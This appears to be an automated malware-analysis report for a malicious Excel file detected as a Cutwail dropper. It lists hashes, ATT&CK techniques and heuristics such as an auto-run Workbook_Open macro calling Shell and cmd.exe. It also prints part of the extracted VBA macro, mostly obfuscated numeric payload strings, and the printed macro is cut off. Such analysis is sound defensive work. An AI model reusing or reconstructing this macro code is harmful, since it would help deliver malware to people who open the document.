Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3e0329c3aa012766…

MALICIOUS

Office (OLE)

76.5 KB Created: 2007-03-28 05:49:49 Authoring application: Microsoft Excel First seen: 2019-01-11
MD5: e9e0167f4c0a3bad4e4c72f7e00bec40 SHA-1: ee66384f1e68fbc0c7fbed48d731167d3e767675 SHA-256: 3e0329c3aa0127666f5de14994485f229a14ab9bc13be875872f8493037e076c
260 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1059.003 Windows Command Shell T1204.002 Malicious File

The critical heuristic 'OLE_VBA_SHELL' and high heuristic 'OLE_VBA_CMD' indicate that the VBA macro within this Excel file attempts to execute a command using cmd.exe. The presence of a 'Workbook_Open' macro, identified by 'OLE_VBA_WBOPEN' and 'OLE_VBA_PCODE_AUTOEXEC_EXEC', suggests this malicious action is triggered automatically upon opening the document. The ClamAV detection further confirms its malicious nature as a dropper.

Heuristics 6

  • ClamAV: Xls.Dropper.Cutwail-6737961-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Xls.Dropper.Cutwail-6737961-0
  • VBA macros detected medium 4 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • Workbook_Open macro high OLE_VBA_WBOPEN
    Workbook_Open macro
  • cmd.exe reference in VBA high OLE_VBA_CMD
    cmd.exe reference in VBA
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 6006 bytes
SHA-256: f4549a86b4a5ae67bb89b6fafdb40d2c753870254d67ea1e48d6bd515c3d6ce0
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
























































Function testforD()
testforD = ",71,12,44,4,7,60,40,65,60,55,65,60,59,65,60,39,65,60,17,65,7,5,29,8,5,48,82,12,83,25,48,37,48,12,32,82,35,78,52,35,48,37,48,33,26,48,37,48,14,27,22,48,37,48,47,54,47,35,48,81,5,5,81,5,5,62,5,5,75,75,75,67,4,7,60,59,65,60,55,65,7,5,29,20,5,48,47,48,37,48,70,31,48,81,5,4,48,70,48,81,5,4,7,60,59,65,60,55,65,60,17,65,7,29,20,48,83,78,19,29,14,46,9,78,48,37,48,2,48,37,48,79,48,81,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,29,35,54,23,78,48,37,48,51,27,27,48,81,5,29,51,47,47,78,32,46,31,54,83,70,32,78,5,4,7,60,59,65,60,17,65,60,39,65,60,55,65,60,40,65,7,5,29,20,48,72,54,48,37,48,0,70,19,22,48,37,48,47,48,37,48,79,78,32,82,61,48,37,48,33,34,48,81,62,10,60,34,65,21,75,75,75,67,4,48,70,48,81,5,4,7,60,40,65,60,55,65,60,39,65,60,17,65,60,59,65,7,29,20,5,48,23,48,37,48,79,78,32,82,61,0,70,48,37,48,34,82,43,22,79,32,70,48,37,48,19,22,33,48,37,48,72,54,47,48,81,4"
End Function
Function markcorrect()
markcorrect = ",4,82,4,48,70,48,81,5,4,7,60,17,65,60,59,65,60,55,65,7,29,20,5,48,31,22,78,33,48,37,48,79,48,37,48,83,78,79,82,73,78,46,25,48,81,81,82,4,7,60,55,65,60,59,65,7,5,29,20,48,78,33,36,78,70,27,48,37,48,14,23,48,81,82,28,33,53,49,30,78,4,4,7,60,59,65,60,17,65,60,39,65,60,74,65,60,3,65,60,55,65,60,40,65,7,5,29,20,5,48,11,79,48,37,48,78,82,22,46,46,82,2,49,41,9,0,61,13,53,59,41,11,23,82,23,33,48,37,48,79,23,47,64,41,48,37,48,41,22,32,48,37,48,34,48,37,48,34,48,37,48,70,48,81,81,81,62,10,60,49,65,21,82,4,48,70,48,81,5,4,7,60,59,65,60,55,65,7,5,29,20,48,43,54,48,37,48,79,78,56,44,48,81,5,40,76,74,59,62,4,59,82,82,24,81,75,75,75,42,75,75,75,67,4,48,50,48,81,60,20,49,0,78,70,2,11,4,10,60,68,65,5,22,33,4,59,82,82,74,55,76,81,81,60,10,60,71,65,21,10,60,26,65,82,4,7,60,17,65,60,55,65,60,59,65,7,5,29,20,5,48,78,31,48,37,48,22,68,48,37,48,26,78,79,71,48,81,82,28,33,53,49,30,78,4,10,60,52,65,37,10,60,58,65,81,62,10,60,14,65,56,10,60,58,65,"
End Function
Function counterst()
counterst = "66,74,17,59,63,10,60,52,65,44,21,4,5,4,82,4,7,60,17,65,60,59,65,60,55,65,7,29,20,48,0,28,51,43,48,37,48,31,78,48,37,48,57,51,48,81,5,5,4,7,60,55,65,60,59,65,7,29,20,48,27,26,48,37,48,17,48,81,5,29,57,70,45,16,78,49,83,31,15,5,81,64,64,4,7,60,55,65,60,59,65,7,29,20,48,31,49,49,0,48,37,48,8,48,81,82,28,33,53,49,30,78,4,4,10,60,23,65,82,7,43,7,29,46,70,33,27,55,3,81,66,55,74,81,29,46,49,0,4,10,60,71,65,82,7,26,7,5,29,46,70,33,27,5,55,3,81,81,65,65,62,82,4,7,60,55,65,60,59,65,7,5,29,20,5,48,52,48,37,48,28,12,48,81,4,5,4,75,75,75,67,4,7,60,59,65,60,55,65,60,17,65,60,39,65,7,29,20,5,48,26,48,37,48,78,79,29,53,51,48,37,48,0,28,48,37,48,51,43,31,12,48,81,5,4,7,60,59,65,60,55,65,7,29,20,48,61,26,48,37,48,83,53,48,81,5,29,53,51,31,18,78,49,5,5,81,64,64,7,70,72,25,77,22,28,7,82,7,34,78,79,72,77,35,0,77,28,83,34,7,4,10,60,49,65,56,59,82,82,40,24,39,17,44,81,81,42,25,45,22,23,5,67,67,2,32,27,5,41,25,5,23,49,19,78,36,47,38,78,45,45,5,5,29,83,49,31,14,26,5,29,78,52,12,25,16,35,5,43,5"
End Function
Function certiff()
certiff = "4,71,70,72,72,5,29,72,35,5,5,29,33,49,71,36,49,8,5,29,19,22,5,11,22,5,5,29,83,14,83,22,83,79,78,5,5,5,5,5,75,75,75,67,5,5,4,69,7,60,17,65,60,59,65,60,55,65,69,7,5,29,20,5,48,29,35,48,37,48,54,23,78,48,37,48,51,27,27,48,5,81,5,29,51,47,47,78,32,5,4,5,5,69,7,60,39,65,60,40,65,60,59,65,60,55,65,60,17,65,69,7,29,20,5,48,49,48,37,48,33,25,49,48,37,48,0,78,48,37,48,71,48,37,4,5,69,7,60,59,65,60,55,65,60,17,65,69,7,29,20,48,0,78,48,37,48,47,78,33,79,70,48,37,48,79,22,48,5,5,81,81,5,5,62,5,5,5,5,5,82,4,5,5,69,7,60,39,65,60,17,65,60,55,65,60,59,65,69,7,29,20,5,4,5,5,69,7,60,59,65,60,55,65,69,7,5,29,20,5,48,72,28,48,37,48,14,33,48,81,37,4,5,5,69,7,60,55,65,60,59,65,69,7,5,29,20,48,78,47,48,37,48,68,71,0,48,5,81,
... (truncated)